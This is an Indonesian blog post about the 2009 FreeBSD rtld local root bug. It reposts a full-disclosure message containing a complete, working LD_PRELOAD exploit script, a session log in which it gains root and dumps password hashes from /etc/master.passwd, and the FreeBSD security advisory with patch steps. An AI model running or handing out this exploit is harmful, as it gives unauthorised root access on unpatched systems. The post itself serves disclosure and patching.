local r00t exploit zeroday pada FreeBSD
Pada kesempatan kali ini saya akan menulis tentang exploit yang ditemukan pada sistim operasi FreeBSD baru-baru ini. Exploit ini adalah exploit lokal yang jika dijalankan akan mengakibatkan user biasa dapat mendapat akses sebagai root pada sistem.
berikut ini adalah laporan adanya local r00t exploit ini di sebuah archive milis http://seclists.org/fulldisclosure/2009/Nov/371
** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 “BiG TiME”
“Go fetch your FreeBSD r00tkitz” // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like “ping” or “su”.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 | Example exploiting session
**********************************
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
&:/home/kcope:/bin/sh
#
Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN |
*EXPLOIT*
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | #!/bin/sh echo ** FreeBSD local r00t zeroday echo by Kingcope echo November 2009 cat > env.c << _EOF #include <stdio.h> main() { extern char **environ; environ = (char**)malloc(8096); environ[0] = (char*)malloc(1024); environ[1] = (char*)malloc(1024); strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); execl("/sbin/ping", "ping", 0); } _EOF gcc env.c -o env cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { extern char **environ; environ=NULL; system("echo ALEX-ALEX;/bin/sh"); } _EOF gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles cp w00t.so.1.0 /tmp/w00t.so.1.0 ./env |
versi FreeBSD yang rentan terhadap exploit tersebut antara lain adalah FreeBSD 7 dan FreeBSD 8, sedangkan versi sebelumnya dari sistim operasi ini tidak rentan terhadap exploit ini. Exploit ini memanfaatkan celah keamanan yang ada pada rtld (Run-Time Link-Editor) yang ada pada sistem FreeBSD.
untuk patch dari local r00t exploit tersebut petunjuk dan lokasi mengunduhnya dapat dilihat di http://security.freebsd.org/advisories/FreeBSD-SA-09:16.rtld.asc.
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
=============================================================================
FreeBSD-SA-09:16.rtld Security Advisory
The FreeBSD Project
Topic: Improper environment sanitization in rtld(1)
Category: core
Module: rtld
Announced: 2009-12-03
Affects: FreeBSD 7.0 and later.
Corrected: 2009-12-01 02:59:22 UTC (RELENG_8, 8.0-STABLE)
2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)
2009-12-01 03:00:16 UTC (RELENG_7, 7.2-STABLE)
2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)
2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)
CVE Name: CVE-2009-4146, CVE-2009-4147
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
I. Background
The run-time link-editor, rtld, links dynamic executable with their
needed libraries at run-time. It also allows users to explicitly
load libraries via various LD_ environmental variables.
II. Problem Description
When running setuid programs rtld will normally remove potentially
dangerous environment variables. Due to recent changes in FreeBSD
environment variable handling code, a corrupt environment may
result in attempts to unset environment variables failing.
III. Impact
An unprivileged user who can execute programs on a system can gain
the privileges of any setuid program which he can run. On most
systems configurations, this will allow a local attacker to execute
code as the root user.
IV. Workaround
No workaround is available, but systems without untrusted local users,
where all the untrusted local users are jailed superusers, and/or where
untrusted users cannot execute arbitrary code (e.g., due to use of read
only and noexec mount options) are not affected.
Note that “untrusted local users” include users with the ability to
upload and execute web scripts (CGI, PHP, Python, Perl etc.), as they
may be able to exploit this issue.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE,
or to the RELENG_8_0, RELENG_7_2, or RELENG_7_1 security branch dated
after the correction date.
2) To patch your present system:
The following patches have been verified to apply to FreeBSD 7.1, 7.2,
and 8.0 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 7.x]
1 2 | # fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch # fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch.asc |
[FreeBSD 8.0]
1 2 | # fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch # fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc |
b) Execute the following commands as root:
1 2 3 4 | # cd /usr/src # patch < /path/to/patch # cd /usr/src/libexec/rtld-elf # make obj && make depend && make && make install |
NOTE: On the amd64 platform, the above procedure will not update the
ld-elf32.so.1 (i386 compatibility) run-time link-editor (rtld). On
amd64 systems where the i386 rtld are installed, the operating system
should instead be recompiled as described in
VI. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | CVS: Branch Revision Path - ------------------------------------------------------------------------- RELENG_7 src/libexec/rtld-elf/rtld.c 1.124.2.7 RELENG_7_2 src/UPDATING 1.507.2.23.2.8 src/sys/conf/newvers.sh 1.72.2.11.2.9 src/libexec/rtld-elf/rtld.c 1.124.2.4.2.2 RELENG_7_1 src/UPDATING 1.507.2.13.2.12 src/sys/conf/newvers.sh 1.72.2.9.2.13 src/libexec/rtld-elf/rtld.c 1.124.2.3.2.2 RELENG_8 src/libexec/rtld-elf/rtld.c 1.139.2.4 RELENG_8_0 src/UPDATING 1.632.2.7.2.4 src/sys/conf/newvers.sh 1.83.2.6.2.4 src/libexec/rtld-elf/rtld.c 1.139.2.2.2.2 - ------------------------------------------------------------------------- Subversion: Branch/path Revision - ------------------------------------------------------------------------- stable/7/ r199981 releng/7.2/ r200054 releng/7.1/ r200054 stable/8/ r199980 releng/8.0/ r200054 - ------------------------------------------------------------------------- |
VII. References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4146
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4147
The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-09:16.rtld.asc
1 2 3 4 5 6 7 | -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (FreeBSD) iEUEARECAAYFAksXg/IACgkQFdaIBMps37KrLwCdH4JsCrvdS1RGoGj7MlNgV3+/ nhYAliVcz9tL8Ll6pYKpIalR740sZ5s= =jK/a -----END PGP SIGNATURE----- |
walaupun setelah dicoba, mesin yang saya patch masih dapat terkena exploit ini (FreeBSD 7.2-RELEASE). mungkin masih ada langkah-langkah yang belum saya lakukan dalam prosedur patching ini sehingga masih belum dapat bebas dari serangan exploit local ini.
Update: (7 Desember 2009)
untuk melakukan patch cukup gunakan freebsd-update dengan menjalankan perintah sebagai berikut sebagai root:
terima kasih banyak kepada mas arif atas tambahan cara patch untuk exploit ini.
Sekian tulisan kali ini. Semoga bermanfaat.
Source : http://crescenthikari.wordpress.com/2009/12/04/local-r00t-exploit-zeroday-pada-freebsd/
Bookmarks:
This entry was posted
on Tuesday, February 23rd, 2010 at 5:23 pm and is filed under FreeBSD.
You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
February 23rd, 2010 at 9:11 pm